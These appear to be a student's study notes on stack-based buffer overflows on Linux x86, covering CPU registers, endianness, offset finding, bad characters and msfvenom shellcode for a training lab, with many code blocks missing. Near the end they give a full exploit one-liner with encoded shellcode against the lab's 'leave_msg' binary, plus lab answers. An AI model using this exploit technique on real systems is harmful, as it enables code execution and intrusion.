💮Stack Based Buffer Overflow
Stack-Based Buffer Overflows on Linux x86
Contents
Introduction
Buffer Overflows Overview
Exploit Development Introduction
CPU Architecture
Memory
Central Processing Unit
RISC
CISC
Instruction Cycle
Fundamentals
Stack-Based Buffer Overflow
The Memory
Disable ASLR
Compile C code to a 32bit ELF binary
AT&T Syntax
Break down the info
Intel Syntax
Change GDB Syntax
Q: At which address in the "main" function is the "bowfunc" function gets called?
CPU Registers
Data registers
Pointer registers
Stack frames
Prologue
Epilogue
Index registers
Endianness
Exploit
Take Control of EIP
Determine the Length for Shellcode
Use in practice
Identification of Bad Characters
Breakpoints
Sending the characters
Q: Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11).
Generating Shellcode
MSFvenom Syntax
MSFvenom - Generate Shellcode
Shellcode
Exploit with shellcode
The Stack
Identification of the Return Address
GDB NOPS
Exploitation
Proof-Of-Concept
Public Exploit Modification
Prevention Techniques and Mechanisms
Skills Assessment
Skills Assessment - Buffer Overflow
Cheat Sheet
Check filetype
objdump
File
Open the file
Set syntax to Intel
Disassemble file
Determine offset with MSFvenom
Run file
Check EIP memory adress
Find gdb offset with MSFvenom
Determine that you have found the offset
Determine length of shellcode
Shellcode calculation with NOPs
In gdb
Check bad characters
Characters
Notes
Find where we need to break a function
Make breakpoint
Send CHARS
Checking stack
Make shellcode
Shellcode
Notes
Run shellcode
Check stack
Find return adress
Convert to little endian
Edit return adress
Final exploit
Introduction
Buffer Overflows Overview
Less common nowadays due to memory protections in modern compilers
C and other languages are still prevalent in embedded systems and IoT
CVE-2021-3156: Recent heap-based buffer overflow in sudo
Web applications can also experience buffer overflows, such as CVE-2017-12542 with HP iLO devices
Incorrect program code can manipulate CPU processing, causing crashes, data corruption, or harm to data structures
Attackers can execute commands with vulnerable process privileges by overwriting return addresses with arbitrary data
Root access is a popular target, but buffer overflows leading to standard user privileges can still be dangerous
Von-Neumann architecture contributes to buffer overflow vulnerabilities
C and C++ languages do not automatically monitor memory buffer limits, leading to increased vulnerability
Java is less likely to experience buffer overflow conditions due to its garbage collection memory management technique.
Buffer overflows are caused by incorrect program code that cannot process large amounts of data, which overwrites registers and can execute code.
If data is written to the reserved memory buffer or stack that is not limited. To tackle this, we should write programs who have limits in their buffer
Exploit Development Introduction
Exploit development is used in the phase of Exploitation Phase. This is after the version has been deemed exploitable.
Developing our own exploits
Very complex
Requires a deep understand of CPU operations
Software's functions that serve as our target
To write exploits we use Python.
Code or programs that are exploits are a proof-of-concept (POC)
Types of exploits
0-day
Newly identified vulnerability
Not public
Developer can not know this
Will persist with new updates
N-day
Local
Executed when opening a file
PDF
Macro (.docx)
Remote
Get payload running on system
Executed over network
DoS
WebApp
CPU Architecture
CPU use the Von-Neumann architecture
Four functional units
Memory
Control Unit
Arithmetical Logical Unit
Input/Output Unit
The most important one is the Arithmetical Logical Unit (ALU) and the Control Unit (CU), are combined to the Central Processing Unit (CPU)!
ALU + CU = CPU
They are responsiple for executing
Instructions
Flow control
Commands and data are fetched from memory
Bus system
Connection between
Processor
Memory
Input/output unit
All data are transeffered via the bus system
Von-Neumann Architecture

Memory
Primary Memory
Cache
Buffer
Always fed with data and code
Random Access Memory (RAM)
Describes memory type
Memory adresses
Secondary Memory
External storage
HDD/SSD
Flash Drives
CD/DVD-ROMs
Not directly accessed by the CPU
Uses the I/O interface
Higher storage capacity
Control Unit
Reading data from the RAM
Saving data in RAM
Provide, decode and execute an instruction
Processing the inputs from peripheral devices
Processing of outputs to peripheral devices
Interrupt control
Monitoring of the entire system
The CU contains the Instruction Register (IR)
Central Processing Unit
Often called the Microprocessor
CPU architectures
x86/i386- (AMD & Intel)x86-64/amd64- (Microsoft & Sun)ARM- (Acorn)
RISC
Reduced Instruction Set Computer
Simplify the complexity of the instuction set for assembly
RISC are in most phones
Fixed length
32-bit
64-bit
CISC
Complex Instrucion Set Computer
CISC does not require 32-bit or 64-bit. It can do it in 8-bit
Instrucion Cycle
Taken from the Academy:
Instruction
Description
1. FETCH
The next machine instruction address is read from the Instruction Address Register (IAR). It is then loaded from the Cache or RAM into the Instruction Register (IR).
2. DECODE
The instruction decoder converts the instructions and starts the necessary circuits to execute the instruction.
3. FETCH OPERANDS
If further data have to be loaded for execution, these are loaded from the cache or RAM into the working registers.
4. EXECUTE
The instruction is executed. This can be, for example, operations in the ALU, a jump in the program, the writing back of results into the working registers, or the control of peripheral devices. Depending on the result of some instructions, the status register is set, which can be evaluated by subsequent instructions.
5. UPDATE INSTRUCTION POINTER
If no jump instruction has been executed in the EXECUTE phase, the IAR is now increased by the length of the instruction so that it points to the next machine instruction.
Fundamentals
Stack-Based Buffer Overflow
Binary files
Protable Executable Format (PE)
Used on Microsoft
Executable and Linking Format (ELF)
Used on UNIX
The Memory

.text
assembler instructions
.data
global and static variables
.bss
allocated variables represented exclusively by 0 bits
Heap
starts at the end of .bss and grows on the higher memory adresses
The Stack
Last-In-First-Out
Defined in RAM
Accessed via a stack pointer
Disable ASLR
Compile C code to a 32bit ELF binary
AT&T Syntax
Dissasemble main
Break down the info
First column
**Hexidecimals **that represent the memory adresses
Memory Address
Address Jumps
Assembler Instruction
Operation Suffixes
0x00000582
<+0>:
lea
0x4(%esp),%ecx
0x00000586
<+4>:
and
$0xfffffff0,%esp
...
...
...
...
Intel Syntax
Change GDB Syntax
Q: At which address in the "main" function is the "bowfunc" function gets called?
Attack chain
Check filetype
Open up file in gdb
Set the syntax to intel
Check out bowfunc
Screenshot:

Then it is just to read out the hexidecimal from the memory adress!
CPU Registers
Registers offer a small amount of storage space where data can be stored temporarily.
Types of registers
General registers
Data registers
Pointer registers
Index registers
Control registers
Segment registers
Data registers
32-bit Register
64-bit Register
Description
EAX
RAX
Accumulator is used in input/output and for arithmetic operations
EBX
RBX
Base is used in indexed addressing
ECX
RCX
Counter is used to rotate instructions and count loops
EDX
RDX
Data is used for I/O and in arithmetic operations for multiply and divide operations involving large values
Pointer registers
32-bit Register
64-bit Register
Description
EIP
RIP
Instruction Pointer stores the offset address of the next instruction to be executed
ESP
RSP
Stack Pointer points to the top of the stack
EBP
RBP
Base Pointer is also known as Stack Base Pointer or Frame Pointer thats points to the base of the stack
Stack Frames
The stack starts with a high address and grows down to low memory addresses.
The Base Pointer points to the beginning (base) of the stack and the Stack Pointer points to the top of the stack.
The stack is divided into regions called Stack Frames that allocate memory for functions as they are called.
A stack frame defines a frame of data with the beginning (EBP) and the end (ESP).
The stack memory is built on a Last-In-First-Out (LIFO) data structure.
Prologue
This is called the Prologue. Moving the ESP on the top for operations.
Epilogue
In the epilogue, the current EBP replaces ESP, and it goes back to its original value from the start of the function. The epilogue is short and can be done in different ways, but our example does it with only two instructions.
Index registers
Register 32-bit
Register 64-bit
Description
ESI
RSI
Source Index is used as a pointer from a source for string operations
EDI
RDI
Destination is used as a pointer to a destination for string operations
Endianness
During load and save operations in registers and memories, the bytes are read in a different order. This byte order is called endianness. Endianness is distinguished between the little-endian format and the big-endian format.
Big-endian and litt~~le-endian are about the order of valence. I~~n big-endian, the digits with the highest valence are initially. In little-endian, the digits with the lowest valence are at the beginning. Mainframe processors use the big-endian format, some RISC architectures, minicomputers, and in TCP/IP networks, the byte order is also in big-endian format.
Now, let us look at an example with the following values:
Address:
0xffff0000Word:
\xAA\xBB\xCC\xDD
Memory Address
0xffff0000
0xffff0001
0xffff0002
0xffff0003
Big-Endian
AA
BB
CC
DD
Little-Endian
DD
CC
BB
AA
This is very important for us to enter our code in the right order later when we have to tell the CPU to which address it should point.
Exploit
Take Control of EIP
We need to get the instruction pointer (EIP) under control, so we can tell it to which adress it should jump to!
This will make it point to the adress where our shellcode starts and the CPU executes it.
Seqmentation Fault
Here we insert 1200 "U"s with running python code into our program. And we have indeed overwritten the EIP.
Determine the Length for Shellcode
Make shellcode with msfvenom
Now we can see that our payload is 68 bytes.
Leverage some no operation instructions (NOPS). This is so our shellcode will be executed at the right place. It is just to push it further away.
Shellcode - Length
How the buffer will look:

Use in practice
Command:
In gdb:
Identification of Bad Characters
Bad characters:
\x00- Null Byte\x0A- Line Feed\x0D- Carriage Return\xFF- Form Feed
To find it we can use this character list: CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
And with using this we can try and find bad characters with running the previous command, just with the wordlist as our payload.
Breakpoints
To break a function we use break *function
Sending the characters
To look at the stack:
We will look where the 0x55 ends.
Every null byte (\x00) shows us that this character is a bad character.
Q: Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11).
\x00\x09\x0A\x20
Generating Shellcode
When generating shell code, pay attention to these ares
ArchitecturePlatformBad Characters
MSFvenom Syntax
MSFvenom - Generate Shellcode
Shellcode
Exploit with Shellcode
The Stack
Identification of the Return Address
GDB NOPS
This picture illustrates where the adress 0xffffd64c is.

After selecting a memory address, we replace our "\x66" which overwrites the EIP to tell it to jump to the 0xffffd64c address. Note that the input of the address is entered backward.
Exploitation
Proof-Of-Concept
Public Exploit Modification
When working with exploits, public ones might not work in your case. That is why we should learn how to edit and write exploits so we can fine tune them to our own usecase.
Prevention Techniques and Mechanisms
Security mechanism preventing this
CanariesKnown values written to the stack between buffer and control data, to detect buffer overflows
Address Space Layout Randomization(ASLR)Difficult to find target adresses in memory
Data Execution Prevention(DEP)Monitors that the program access memory areas cleanly
Skills Assessment
Skills Assessment - Buffer Overflow
Q: Determine the file type of "leave_msg" binary and submit it as the answer.
First we need to take control of the EIP.
To find this, we need to find the memory adress of where our characters end and where the payload starts.
Attack chain:

End memory adress is 0xffffd68a
Convert it to little endian
0xffffd68a -> \x8A\xD6\xFF\xFF
Now our final payload will be
We run the program outside gdb
gdb -q leave_msg
./leave_msg $(python -c 'print "\x55" * (2060 - 124 - 95 - 4) + "\x90" * 124 + "\xd9\xeb\xd9\x74\x24\xf4\x5d\x29\xc9\xb8\xfc\x4b\xe3\x50\xb1\x12\x31\x45\x17\x03\x45\x17\x83\x39\x4f\x01\xa5\xf0\x8b\x32\xa5\xa1\x68\xee\x40\x47\xe6\xf1\x25\x21\x35\x71\xd6\xf4\x75\x4d\x14\x86\x3f\xcb\x5f\xee\xc0\x2b\xa0\xef\x56\x2e\xa0\xfe\xfa\xa7\x41\xb0\x65\xe8\xd0\xe3\xda\x0b\x5a\xe2\xd0\x8c\x0e\x8c\x84\xa3\xdd\x24\x31\x93\x0e\xd6\xa8\x62\xb3\x44\x78\xfc\xd5\xd8\x75\x33\x95" + "\x8A\xD6\xFF\xFF"')
Cheat sheet
Check filetype
Objdump
File
or
Open the file
Set syntax to Intel
Dissasemble file
Determine offset with MSFvenom
MSFvenomthen cat the output
Run file
Check EIP memory adress
EIP displays different memory adress
Use this adress to find the offset
Find gdb offset with MSFvenom
gdb offset with MSFvenomUse the offset that you found
The offset is 1036 in this case
Determine that you have found the offset
Determine length of shellcode
68 bytes
Shellcode calculation with NOPs
NOPsIn gdb
gdbCheck bad characters
Characters
Notes
Find where we need to break a function
output
Make breakpoint
Send CHARS
output
Checking stack
And then find where the x55 ends and check for every null byte x00
Make shellcode
output
Shellcode
output
Notes
Run shellcode
output
Check stack
output
Find return adress
needs breakpoint!!

End memory adress is 0xffffd68a
Convert to little endian
[link](Online Hex Converter - Bytes, Ints, Floats, Significance, Endians - SCADACore)
0xffffd68a -> \x8A\xD6\xFF\xFF
Edit return adress
old:
new:
Final exploit
this is ran outside gdb
Last updated